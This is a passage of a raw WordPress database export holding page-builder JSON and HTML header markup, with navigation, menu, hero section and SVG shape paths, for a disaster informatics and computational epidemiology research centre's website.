children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h36\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":865,\"type\":\"header\",\"props\":{\"text\":\"learn more\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/?page_id=126\"}}}],\"slot\":null,\"parentId\":\"22-h26\",\"index\":2,\"id\":\"22-h35\",\"partialId\":22,\"styleRef\":864,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h29\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h33\",\"parentId\":\"22-h32\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h34\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h31\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',23,'https://gsudice.dataconn.net/?p=1435',0,'revision','',0),(1436,1,'2023-09-29 10:23:19','2023-09-29 14:23:19','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n <path 